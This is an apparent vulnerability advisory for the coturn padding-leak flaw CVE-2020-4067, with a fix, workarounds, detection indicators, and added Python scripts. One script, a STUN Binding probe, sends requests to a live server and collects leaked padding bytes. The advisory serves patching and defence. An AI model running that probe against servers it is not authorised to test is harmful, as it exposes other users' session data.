CVE-2020-4067
📋 TL;DR
CVE-2020-4067 is an information disclosure vulnerability in coturn (STUN/TURN server) versions before 4.5.1.3. The STUN/TURN response buffer is not initialized before it is reused, so the padding bytes that follow response attributes carry stale memory left behind by other client connections. An unauthenticated client can query the server repeatedly and collect those bytes, harvesting fragments of other clients' traffic. Fixed in 4.5.1.3.
💻 Affected Systems
- coturn
📦 What is this software?
Coturn by Coturn Project
Fedora by Fedoraproject
Leap by Opensuse
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
An attacker harvests fragments of other clients' STUN/TURN messages from the leaked padding. STUN attributes are padded to a 4-byte boundary, so each attribute exposes at most 3 stale bytes and the attacker does not choose which bytes land there, but repeated queries accumulate fragments that can include usernames, realm strings, nonces, and mapped or relayed addresses of other sessions. TURN long-term credentials are never sent in clear (the password only keys MESSAGE-INTEGRITY), so outright credential theft is unlikely; the realistic worst case is enough session metadata to target or hijack a specific client's session.
Likely Case
Leakage of a few stale bytes per response from other client sessions: partial usernames, addresses, or other connection metadata rather than complete secrets.
If Mitigated
Limited impact if network access controls keep untrusted clients off the server. Note that any client that can still reach it can read the padding, and a public-facing TURN server (the usual WebRTC deployment) cannot normally be restricted this way.
🎯 Exploit Status
Exploitation needs only network access to a STUN/TURN listener; Binding requests are unauthenticated, so no credentials are required. The vendor advisory and upstream issue #583 describe the technique (repeated queries to harvest padding bytes); no public exploit code is linked from this page.
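What the exploit surface looks like on the wire, as an added example that is not part of this page or of the coturn project: a minimal STUN Binding request builder and a response parser that reports every attribute whose padding bytes are not zero. The two sample responses are constructed, not captured from a server; the assumption that a Binding response carries a SOFTWARE attribute whose length is not a multiple of four (so that padding bytes exist at all) is mine, and probe() is a hypothetical helper for trying this against a server you are authorised to test.

```python
"""STUN Binding probe and padding inspector for CVE-2020-4067 (added example)."""
import os
import socket
import struct

MAGIC_COOKIE = 0x2112A442
BINDING_REQUEST = 0x0001
BINDING_SUCCESS = 0x0101
ATTR_XOR_MAPPED_ADDRESS = 0x0020
ATTR_SOFTWARE = 0x8022
HEADER_LEN = 20


def build_message(msg_type: int, txid: bytes, attrs: bytes = b"") -> bytes:
    """Build a STUN message; the header length field counts attribute padding."""
    if len(txid) != 12:
        raise ValueError("transaction ID must be 12 bytes")
    return struct.pack("!HHI12s", msg_type, len(attrs), MAGIC_COOKIE, txid) + attrs


def build_binding_request(txid: bytes = b"") -> bytes:
    """A bare Binding request: no attributes and no credentials needed."""
    return build_message(BINDING_REQUEST, txid or os.urandom(12))


def encode_attr(atype: int, value: bytes, padding: bytes = b"") -> bytes:
    """TLV-encode one attribute, padding the value to a 4-byte boundary.

    A conforming sender zero-fills the padding; `padding` lets the constructed
    sample below imitate a server that copies stale buffer bytes there instead."""
    pad_len = (-len(value)) % 4
    padding = (padding + b"\x00" * pad_len)[:pad_len]
    return struct.pack("!HH", atype, len(value)) + value + padding


def parse_stun(msg: bytes):
    """Return (msg_type, txid, attrs); attrs is a list of (type, value, padding)."""
    if len(msg) < HEADER_LEN:
        raise ValueError("truncated STUN header")
    msg_type, length, cookie, txid = struct.unpack("!HHI12s", msg[:HEADER_LEN])
    if cookie != MAGIC_COOKIE:
        raise ValueError("magic cookie mismatch: not a STUN message")
    if HEADER_LEN + length != len(msg):
        raise ValueError("header length does not match message size")
    attrs, off = [], HEADER_LEN
    while off < len(msg):
        if off + 4 > len(msg):
            raise ValueError("truncated attribute header")
        atype, alen = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        pad_len = (-alen) % 4
        if off + alen + pad_len > len(msg):
            raise ValueError("attribute runs past end of message")
        value = msg[off:off + alen]
        padding = msg[off + alen:off + alen + pad_len]
        attrs.append((atype, value, padding))
        off += alen + pad_len
    return msg_type, txid, attrs


def nonzero_padding(msg: bytes):
    """List (attr_type, padding) for every attribute whose padding is not all zeros."""
    return [(t, p) for t, _, p in parse_stun(msg)[2] if any(p)]


def probe(host: str, port: int = 3478, timeout: float = 2.0):
    """Hypothetical helper: send one Binding request over UDP and inspect the reply.
    Only run it against servers you are authorised to test."""
    txid = os.urandom(12)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_binding_request(txid), (host, port))
        data, _ = sock.recvfrom(1500)
    msg_type, reply_txid, _ = parse_stun(data)
    if reply_txid != txid or msg_type != BINDING_SUCCESS:
        raise ValueError("reply does not match our Binding request")
    return nonzero_padding(data)


# Constructed samples (not captured from a real server). The SOFTWARE value is
# 14 bytes, so 2 padding bytes follow it; LEAKY_RESPONSE carries stale bytes
# there, CLEAN_RESPONSE the zeros a patched server should send.
SAMPLE_TXID = bytes(range(12))
_XOR_MAPPED = encode_attr(ATTR_XOR_MAPPED_ADDRESS, bytes.fromhex("0001d4c4e1baa52b"))
LEAKY_RESPONSE = build_message(BINDING_SUCCESS, SAMPLE_TXID,
                               _XOR_MAPPED + encode_attr(ATTR_SOFTWARE, b"Coturn-4.5.1.1", b"se"))
CLEAN_RESPONSE = build_message(BINDING_SUCCESS, SAMPLE_TXID,
                               _XOR_MAPPED + encode_attr(ATTR_SOFTWARE, b"Coturn-4.5.1.3"))

if __name__ == "__main__":
    print(nonzero_padding(LEAKY_RESPONSE))  # [(32802, b'se')]
    print(nonzero_padding(CLEAN_RESPONSE))  # []
```

Two caveats when using the probe against a live server: the STUN specification tells receivers to ignore padding, so a non-zero padding byte from some other implementation is not by itself evidence of this CVE, and the stale bytes vary from response to response, so a single all-zero reply does not prove a server is patched; repeat the probe a number of times and combine the result with the version check.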
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.5.1.3
Vendor Advisory: https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm
Restart Required: Yes
Instructions:
1. Stop the coturn service.
2. Update to version 4.5.1.3 or later using your package manager, or compile from source.
3. Restart the coturn service.
4. Verify the new version is running.
🔧 Temporary Workarounds
Network Access Restriction
Restrict network access to coturn servers to trusted clients and networks only. iptables evaluates rules in order, so the ACCEPT rules must precede the DROP rules; replace trusted_network with a CIDR, and add the same pair of rules for the TLS/DTLS listener (5349 by default) if it is enabled:
iptables -A INPUT -p tcp --dport 3478 -s trusted_network -j ACCEPT
iptables -A INPUT -p udp --dport 3478 -s trusted_network -j ACCEPT
iptables -A INPUT -p tcp --dport 3478 -j DROP
iptables -A INPUT -p udp --dport 3478 -j DROP
This only narrows who can reach the server: every client that still can reach it can read the leaked padding, and a TURN server that must serve Internet clients (the typical WebRTC case) cannot be restricted this way, so treat it as a stopgap until the upgrade.
🧯 If You Can't Patch
- Implement strict network segmentation to isolate coturn servers from untrusted networks
- Monitor coturn logs for unusual connection patterns or repeated queries from single sources
🔍 How to Verify
Check if Vulnerable:
There is no 'coturn --version' command; the daemon binary is turnserver, and 'turnserver -v' is its verbose-logging switch, which starts the server rather than printing a version. Read the installed version from the package manager or, for a source build, from the 'Version Coturn-...' banner turnserver logs at startup, and compare it against 4.5.1.3. Distribution packages (Debian, Ubuntu, Fedora, openSUSE) may ship the fix as a backport under an older upstream number, so for those compare the package version against the distribution advisory listed under References rather than against the upstream number.
Check Version:
dpkg -s coturn | grep '^Version'    # Debian/Ubuntu
rpm -q coturn                       # Fedora/openSUSE
Verify Fix Applied:
Confirm the installed version is 4.5.1.3 or later (or a distribution package version the relevant advisory lists as fixed), confirm the running process was restarted so it is no longer the old binary, and test that STUN/TURN functionality remains operational.
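A version triage helper, added here as an example (not the page's or coturn's own code): it pulls the version number out of a startup banner or package version string, compares it against 4.5.1.3, and asks dpkg or rpm for the installed package. The sample strings are constructed; the distro_backport flag is my assumption about how an operator records the answer to "does the distribution advisory list this package version as fixed?", since a backported fix keeps the old upstream number.

```python
"""Version triage for CVE-2020-4067 (added example, not coturn project code)."""
import re
import subprocess

FIXED_UPSTREAM = (4, 5, 1, 3)
_VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)")


def parse_version(text: str) -> tuple:
    """Pull the first dotted version out of strings such as the startup banner
    "Version Coturn-4.5.1.1 'dan Eider'" or a package version such as
    "4.5.1.1-1.1+deb10u1", returned as a 4-tuple of ints for comparison."""
    match = _VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no version number in {text!r}")
    parts = tuple(int(p) for p in match.group(1).split("."))
    return parts + (0,) * (4 - len(parts))


def upstream_is_vulnerable(version_text: str) -> bool:
    """True when the upstream release number is below 4.5.1.3."""
    return parse_version(version_text) < FIXED_UPSTREAM


def installed_version_text() -> str:
    """Ask dpkg or rpm for the installed coturn package version; "" if not found."""
    commands = (
        ["dpkg-query", "-W", "--showformat=${Version}", "coturn"],
        ["rpm", "-q", "--qf", "%{VERSION}-%{RELEASE}", "coturn"],
    )
    for cmd in commands:
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
        except (FileNotFoundError, subprocess.TimeoutExpired):
            continue
        if result.returncode == 0 and result.stdout.strip():
            return result.stdout.strip()
    return ""


def triage(version_text: str, distro_backport: bool = False) -> str:
    """Classify a version string. distro_backport (assumed operator input) is True
    when the distribution advisory (DSA-4711, USN-4415-1, the Fedora/openSUSE
    notices) lists this exact package version as fixed."""
    if not upstream_is_vulnerable(version_text):
        return "fixed (upstream >= 4.5.1.3)"
    if distro_backport:
        return "fixed (distribution backport; upstream number is pre-4.5.1.3)"
    return "vulnerable: upgrade to 4.5.1.3 or to a distro package listed as fixed"


if __name__ == "__main__":
    installed = installed_version_text()
    if installed:
        print(installed, "->", triage(installed))
    else:
        print("coturn package not found; check a source build's startup banner")
```

Run it on the host itself; a result of "vulnerable" for a distribution package is only final once the package version has been compared with the distribution advisory, which is what the distro_backport flag records.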
📡 Detection & Monitoring
Log Indicators:
- Unusually high volume of STUN/TURN requests from a single source IP, well above the per-client baseline
- Many repeated Binding or Allocate requests from one source, possibly with slightly varied parameters, that are never followed by media
Network Indicators:
- High-rate STUN/TURN request traffic to the listener ports (3478, and 5349 for TLS/DTLS) from a single endpoint
- Patterns of repeated, near-identical queries with small variations
Exploitation traffic is protocol-conformant STUN and differs from a legitimate client only in volume and in carrying no media, so these indicators are weak and will false-positive on NAT-heavy client populations; patching is the only reliable control.
SIEM Query (Splunk-style pseudo-query; set threshold from your own per-source baseline):
source="coturn.log" | stats count by src_ip | where count > threshold
🔗 References
- http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00010.html
- https://github.com/coturn/coturn/blob/aab60340b201d55c007bcdc853230f47aa2dfdf1/ChangeLog#L15
- https://github.com/coturn/coturn/issues/583
- https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm
- https://lists.debian.org/debian-lts-announce/2020/07/msg00002.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5G35UBNSRLL6SYRTODYTMBJ65TLQILUM/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNJJO77ZLGGFJWNUGP6VDG5HPAC5UDBK/
- https://usn.ubuntu.com/4415-1/
- https://www.debian.org/security/2020/dsa-4711